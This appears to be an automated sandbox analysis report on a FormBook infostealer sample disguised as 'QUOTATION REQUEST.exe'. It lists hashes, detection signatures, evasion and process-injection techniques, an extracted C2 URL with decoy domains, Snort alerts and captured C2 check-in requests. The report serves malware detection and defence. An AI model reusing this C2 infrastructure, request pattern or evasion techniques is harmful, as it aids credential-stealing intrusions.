Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name:	QUOTATION REQUEST.exe
Analysis ID:	402973
MD5:	64af41000584694858d0fcc37b1bf69b
SHA1:	707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:	fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Multi AV Scanner detection for submitted file

Source: QUOTATION REQUEST.exe	Virustotal: Detection: 18%			Perma Link
Source: QUOTATION REQUEST.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: QUOTATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: QUOTATION REQUEST.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source:	Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 4x nop then pop ebx	3_2_00406AA3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 4x nop then pop edi	3_2_0040C3C3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx	9_2_00ED6AA3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi	9_2_00EDC3C3

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.pedroiniesta.net/n7ad/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 46.30.211.38 46.30.211.38
Source: Joe Sandbox View	IP Address: 81.17.18.196 81.17.18.196

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1Host: www.letsratethis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1Host: www.cannabisllp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1Host: www.buffalobooze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1Host: www.checkmytradesmanswork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1Host: www.inthebeginningshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1Host: www.madisonroselove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1Host: www.pedroiniesta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1Host: www.freecleanlimpieza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1Host: www.graet.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1Host: www.sloanksmith.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.sloanksmith.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Mon, 03 May 2021 14:51:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: explorer.exe, 00000005.00000000.253105057.00000000089FF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: QUOTATION REQUEST.exe	String found in binary or memory: https://github.com/unguest
Source: QUOTATION REQUEST.exe	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
